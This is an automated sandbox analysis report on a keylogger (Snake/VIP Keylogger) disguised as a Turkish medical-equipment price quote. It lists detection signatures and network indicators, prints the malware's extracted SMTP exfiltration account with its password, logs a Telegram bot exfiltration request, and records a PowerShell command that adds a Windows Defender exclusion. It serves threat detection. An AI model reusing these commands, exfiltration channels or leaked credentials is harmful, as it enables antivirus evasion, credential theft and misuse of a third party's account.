Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe

Overview

General Information

Sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
renamed because original name is a hash value
Original sample name:fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Siparii jpeg docx .exe
Analysis ID:1572491
MD5:b0fa72f0c9b26ed1ac2da43dafca043d
SHA1:ac61096e7db4965ffcf69b4deb277fe952dd8b6c
SHA256:7bc91b9cdac45afdf50b3d0172e853c20d2040ceeca205bf2fbce469e12bfa88
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d0d5:$a1: get_encryptedPassword
        • 0x2d3ea:$a2: get_encryptedUsername
        • 0x2cee5:$a3: get_timePasswordChanged
        • 0x2cfee:$a4: get_passwordField
        • 0x2d0eb:$a5: set_encryptedPassword
        • 0x2e7b5:$a7: get_logins
        • 0x2e718:$a10: KeyLoggerEventArgs
        • 0x2e37d:$a11: KeyLoggerEventArgsEventHandler
        00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2b4d5:$a1: get_encryptedPassword
                • 0x2b7ea:$a2: get_encryptedUsername
                • 0x2b2e5:$a3: get_timePasswordChanged
                • 0x2b3ee:$a4: get_passwordField
                • 0x2b4eb:$a5: set_encryptedPassword
                • 0x2cbb5:$a7: get_logins
                • 0x2cb18:$a10: KeyLoggerEventArgs
                • 0x2c77d:$a11: KeyLoggerEventArgsEventHandler
                1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x392b6:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38959:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38bb6:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39595:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 26 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7120, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 2988, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7120, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 2988, ProcessName: powershell.exe
                Sigma detected: Suspicious Outbound SMTP Connections
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.159.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, Initiated: true, ProcessId: 1088, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49822
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ParentImage: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ParentProcessId: 7120, ParentProcessName: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe", ProcessId: 2988, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T16:24:17.156611+010028033053Unknown Traffic192.168.2.649726172.67.177.134443TCP
                2024-12-10T16:24:32.022250+010028033053Unknown Traffic192.168.2.649777172.67.177.134443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T16:24:13.328856+010028032742Potentially Bad Traffic192.168.2.649711193.122.130.080TCP
                2024-12-10T16:24:15.531874+010028032742Potentially Bad Traffic192.168.2.649711193.122.130.080TCP
                2024-12-10T16:24:18.378706+010028032742Potentially Bad Traffic192.168.2.649735193.122.130.080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000006.00000002.4683212312.0000000002871000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "bilgi@adendanismanlik.com.tr", "Password": "Omer1402&", "Host": "mail.adendanismanlik.com.tr", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49718 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49797 version: TLS 1.2
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cOXk.pdbSHA256 source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: Binary string: cOXk.pdb source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 077486A4h1_2_0774818B
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0284F475h6_2_0284F2E7
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0284F475h6_2_0284F4C4
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0284F475h6_2_0284F545
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0284FC31h6_2_0284F98C
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657E0A9h6_2_0657DE00
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 06570D0Dh6_2_06570B30
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 06571697h6_2_06570B30
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 06572C19h6_2_06572968
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 065731E0h6_2_06572DC8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657E501h6_2_0657E258
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06570673
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657E959h6_2_0657E6B0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657F209h6_2_0657EF60
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657EDB1h6_2_0657EB08
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657F661h6_2_0657F3B8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06570853
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06570040
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657FAB9h6_2_0657F810
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657D3A1h6_2_0657D0F8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657CF49h6_2_0657CCA0
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657D7F9h6_2_0657D550
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 065731E0h6_2_0657310E
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 065731E0h6_2_06572DC2
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then jmp 0657DC51h6_2_0657D9A8
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 4x nop then push 00000000h6_2_0674F2F8

                Networking

                barindex
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.6:49822 -> 77.245.159.14:587
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:36:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49735 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 172.67.177.134:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49777 -> 172.67.177.134:443
                Source: global trafficTCP traffic: 192.168.2.6:49822 -> 77.245.159.14:587
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49718 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.175 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:571345%0D%0ADate%20and%20Time:%2011/12/2024%20/%2014:36:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20571345%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.adendanismanlik.com.tr
